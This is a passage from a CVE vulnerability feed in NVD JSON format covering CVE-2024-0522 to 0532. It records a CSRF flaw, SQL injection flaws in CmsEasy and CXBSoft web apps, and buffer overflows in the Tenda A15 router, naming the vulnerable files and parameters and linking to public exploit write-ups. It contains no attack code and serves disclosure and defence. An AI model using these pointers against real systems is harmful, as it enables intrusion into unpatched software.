: 7.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-20T21:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0522", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://vuldb.com/?ctiid.250692", "name" : "https://vuldb.com/?ctiid.250692", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250692", "name" : "https://vuldb.com/?ctiid.250692", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250692", "name" : "https://vuldb.com/?id.250692", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250692", "name" : "https://vuldb.com/?id.250692", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in Allegro RomPager 4.01. It has been classified as problematic. Affected is an unknown function of the file usertable.htm?action=delete of the component HTTP POST Request Handler. The manipulation of the argument username leads to cross-site request forgery. It is possible to launch the attack remotely. Upgrading to version 4.30 is able to address this issue. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-250692. NOTE: The vendor explains that this is a very old issue that got fixed 20 years ago but without a public disclosure." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:allegrosoft:rompager:4.01:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 8.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 2.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-14T23:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0523", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/V3geD4g/cmseasy_vul/blob/main/SQL1-EN.md", "name" : "https://github.com/V3geD4g/cmseasy_vul/blob/main/SQL1-EN.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://github.com/V3geD4g/cmseasy_vul/blob/main/SQL1-EN.md", "name" : "https://github.com/V3geD4g/cmseasy_vul/blob/main/SQL1-EN.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250693", "name" : "https://vuldb.com/?ctiid.250693", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250693", "name" : "https://vuldb.com/?ctiid.250693", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250693", "name" : "https://vuldb.com/?id.250693", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250693", "name" : "https://vuldb.com/?id.250693", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in CmsEasy up to 7.7.7. It has been declared as critical. Affected by this vulnerability is the function getslide_child_action in the library lib/admin/language_admin.php. The manipulation of the argument sid leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250693 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:cmseasy:cmseasy:*:*:*:*:*:*:*:*", "versionEndIncluding" : "7.7.7.0", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-14T23:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0524", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://note.zhaoj.in/share/GdpwiaItePFq", "name" : "https://note.zhaoj.in/share/GdpwiaItePFq", "refsource" : "", "tags" : [ "Broken Link", "Third Party Advisory" ] }, { "url" : "https://note.zhaoj.in/share/GdpwiaItePFq", "name" : "https://note.zhaoj.in/share/GdpwiaItePFq", "refsource" : "", "tags" : [ "Broken Link", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250694", "name" : "https://vuldb.com/?ctiid.250694", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?ctiid.250694", "name" : "https://vuldb.com/?ctiid.250694", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.250694", "name" : "https://vuldb.com/?id.250694", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.250694", "name" : "https://vuldb.com/?id.250694", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in CXBSoft Url-shorting up to 1.3.1. It has been rated as critical. Affected by this issue is some unknown functionality of the file index.php. The manipulation of the argument url leads to sql injection. The exploit has been disclosed to the public and may be used. VDB-250694 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:cxbsoft:url-shorting:*:*:*:*:*:*:*:*", "versionEndIncluding" : "1.3.1", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-15T00:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0525", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://note.zhaoj.in/share/9tjcunCPidgI", "name" : "https://note.zhaoj.in/share/9tjcunCPidgI", "refsource" : "", "tags" : [ "Broken Link", "Third Party Advisory" ] }, { "url" : "https://note.zhaoj.in/share/9tjcunCPidgI", "name" : "https://note.zhaoj.in/share/9tjcunCPidgI", "refsource" : "", "tags" : [ "Broken Link", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250695", "name" : "https://vuldb.com/?ctiid.250695", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?ctiid.250695", "name" : "https://vuldb.com/?ctiid.250695", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.250695", "name" : "https://vuldb.com/?id.250695", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.250695", "name" : "https://vuldb.com/?id.250695", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability classified as critical has been found in CXBSoft Url-shorting up to 1.3.1. This affects an unknown part of the file /pages/long_s_short.php of the component HTTP POST Request Handler. The manipulation of the argument longurl leads to sql injection. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250695. NOTE: The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:cxbsoft:url-shorting:*:*:*:*:*:*:*:*", "versionEndIncluding" : "1.3.1", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-15T00:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0526", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://note.zhaoj.in/share/Zezf8fmoq7lk", "name" : "https://note.zhaoj.in/share/Zezf8fmoq7lk", "refsource" : "", "tags" : [ "Broken Link", "Third Party Advisory" ] }, { "url" : "https://note.zhaoj.in/share/Zezf8fmoq7lk", "name" : "https://note.zhaoj.in/share/Zezf8fmoq7lk", "refsource" : "", "tags" : [ "Broken Link", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250696", "name" : "https://vuldb.com/?ctiid.250696", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?ctiid.250696", "name" : "https://vuldb.com/?ctiid.250696", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.250696", "name" : "https://vuldb.com/?id.250696", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.250696", "name" : "https://vuldb.com/?id.250696", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability classified as critical was found in CXBSoft Url-shorting up to 1.3.1. This vulnerability affects unknown code of the file /pages/short_to_long.php of the component HTTP POST Request Handler. The manipulation of the argument shorturl leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250696. NOTE: The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:cxbsoft:url-shorting:*:*:*:*:*:*:*:*", "versionEndIncluding" : "1.3.1", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-15T00:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0527", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://note.zhaoj.in/share/6bz65C2dfgUk", "name" : "https://note.zhaoj.in/share/6bz65C2dfgUk", "refsource" : "", "tags" : [ "Broken Link", "Third Party Advisory" ] }, { "url" : "https://note.zhaoj.in/share/6bz65C2dfgUk", "name" : "https://note.zhaoj.in/share/6bz65C2dfgUk", "refsource" : "", "tags" : [ "Broken Link", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250697", "name" : "https://vuldb.com/?ctiid.250697", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?ctiid.250697", "name" : "https://vuldb.com/?ctiid.250697", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.250697", "name" : "https://vuldb.com/?id.250697", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.250697", "name" : "https://vuldb.com/?id.250697", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability, which was classified as critical, has been found in CXBSoft Url-shorting up to 1.3.1. This issue affects some unknown processing of the file /admin/pages/update_go.php of the component HTTP POST Request Handler. The manipulation of the argument version leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier VDB-250697 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:cxbsoft:url-shorting:*:*:*:*:*:*:*:*", "versionEndIncluding" : "1.3.1", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-15T01:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0528", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://note.zhaoj.in/share/grOgvdMgn0wg", "name" : "https://note.zhaoj.in/share/grOgvdMgn0wg", "refsource" : "", "tags" : [ "Broken Link", "Third Party Advisory" ] }, { "url" : "https://note.zhaoj.in/share/grOgvdMgn0wg", "name" : "https://note.zhaoj.in/share/grOgvdMgn0wg", "refsource" : "", "tags" : [ "Broken Link", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250698", "name" : "https://vuldb.com/?ctiid.250698", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?ctiid.250698", "name" : "https://vuldb.com/?ctiid.250698", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.250698", "name" : "https://vuldb.com/?id.250698", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.250698", "name" : "https://vuldb.com/?id.250698", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability, which was classified as critical, was found in CXBSoft Post-Office 1.0. Affected is an unknown function of the file /admin/pages/update_go.php of the component HTTP POST Request Handler. The manipulation of the argument version leads to sql injection. The exploit has been disclosed to the public and may be used. VDB-250698 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:cxbsoft:post-office:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-15T01:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0529", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://note.zhaoj.in/share/neURUa2NSxzd", "name" : "https://note.zhaoj.in/share/neURUa2NSxzd", "refsource" : "", "tags" : [ "Broken Link", "Third Party Advisory" ] }, { "url" : "https://note.zhaoj.in/share/neURUa2NSxzd", "name" : "https://note.zhaoj.in/share/neURUa2NSxzd", "refsource" : "", "tags" : [ "Broken Link", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250699", "name" : "https://vuldb.com/?ctiid.250699", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250699", "name" : "https://vuldb.com/?ctiid.250699", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250699", "name" : "https://vuldb.com/?id.250699", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250699", "name" : "https://vuldb.com/?id.250699", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability has been found in CXBSoft Post-Office up to 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /apps/login_auth.php of the component HTTP POST Request Handler. The manipulation of the argument username_login leads to sql injection. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250699. NOTE: The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:cxbsoft:post-office:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-15T02:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0530", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://note.zhaoj.in/share/HUxa372VNwad", "name" : "https://note.zhaoj.in/share/HUxa372VNwad", "refsource" : "", "tags" : [ "Broken Link", "Third Party Advisory" ] }, { "url" : "https://note.zhaoj.in/share/HUxa372VNwad", "name" : "https://note.zhaoj.in/share/HUxa372VNwad", "refsource" : "", "tags" : [ "Broken Link", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250700", "name" : "https://vuldb.com/?ctiid.250700", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?ctiid.250700", "name" : "https://vuldb.com/?ctiid.250700", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.250700", "name" : "https://vuldb.com/?id.250700", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.250700", "name" : "https://vuldb.com/?id.250700", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in CXBSoft Post-Office up to 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file /apps/reg_go.php of the component HTTP POST Request Handler. The manipulation of the argument username_reg leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250700. NOTE: The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:cxbsoft:post-office:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-15T02:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0531", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-787" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/yaoyue123/iot/blob/main/Tenda/A15/setBlackRule.md", "name" : "https://github.com/yaoyue123/iot/blob/main/Tenda/A15/setBlackRule.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://github.com/yaoyue123/iot/blob/main/Tenda/A15/setBlackRule.md", "name" : "https://github.com/yaoyue123/iot/blob/main/Tenda/A15/setBlackRule.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250701", "name" : "https://vuldb.com/?ctiid.250701", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?ctiid.250701", "name" : "https://vuldb.com/?ctiid.250701", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.250701", "name" : "https://vuldb.com/?id.250701", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.250701", "name" : "https://vuldb.com/?id.250701", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in Tenda A15 15.13.07.13. It has been classified as critical. This affects an unknown part of the file /goform/setBlackRule of the component Web-based Management Interface. The manipulation of the argument deviceList leads to stack-based buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250701 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:tenda:a15_firmware:15.13.07.13:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:tenda:a15:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "HIGH", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 7.2, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.2, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-15T02:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0532", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-119" }, { "lang" : "en", "value" : "CWE-121" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/yaoyue123/iot/blob/main/Tenda/A15/WifExtraSet.md", "name" : "https://github.com/yaoyue123/iot/blob/main/Tenda/A15/WifExtraSet.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://github.com/yaoyue123/iot/blob/main/Tenda/A15/WifExtraSet.md", "name" : "https://github.com/yaoyue123/iot/blob/main/Tenda/A15/WifExtraSet.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250702", "name" : "https://vuldb.com/?ctiid.250702", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?ctiid.250702", "name" : "VDB-250702 | CTI Indicators (IOB, IOC, IOA)", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.250702", "name" : "https://vuldb.com/?id.250702", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.250702", "name" : "VDB-250702 | Tenda A15 Web-based Management Interface WifiExtraSet set_repeat5 stack-based overflow", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?submit.262690", "name" : "Submit #262690 | Tenda Tenda A15 V15.13.07.13 buffer overflow", "refsource" : "", "tags" : [ ] }, { "url" : "https://www.tenda.com.cn/", "name" : "https://www.tenda.com.cn/", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in Tenda A15 15.13.07.13. It has been declared as critical. This vulnerability affects the function set_repeat5 of the file /goform/WifiExtraSet of the component Web-based Management Interface. The manipulation of the argument wpapsk_crypto2_4g/wpapsk_crypto5g leads to stack-based buffer overflow. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:tenda:a15_firmware:15.13.07.13:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : 